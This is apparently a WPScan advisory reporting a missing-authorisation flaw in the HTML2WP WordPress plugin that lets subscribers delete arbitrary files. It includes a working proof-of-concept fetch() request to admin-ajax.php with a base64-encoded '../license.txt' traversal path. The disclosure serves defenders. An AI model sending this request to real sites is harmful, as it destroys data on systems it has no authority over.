WordPress Plugin Vulnerabilities
HTML2WP <= 1.0.0 - Subscriber+ Arbitrary File Deletion
Description
The plugin does not have authorisation and CSRF checks in an AJAX action, available to any authenticated users such as subscriber, which could allow them to delete arbitrary file
Proof of Concept
To delete the license.txt at the root of the blog:
await fetch("https://example.com/wp-admin/admin-ajax.php?action=html_actions", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "de,en;q=0.7,en-US;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1"
},
"body": "type=remove_html&path=Li4vbGljZW5zZS50eHQ=",
"method": "POST",
"mode": "cors"
});
Affects Plugins
No known fix References
CVE
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-02 (about 1 years ago)
Added
2022-06-02 (about 1 years ago)
Last Updated
2023-03-05 (about 9 months ago)
WPScan 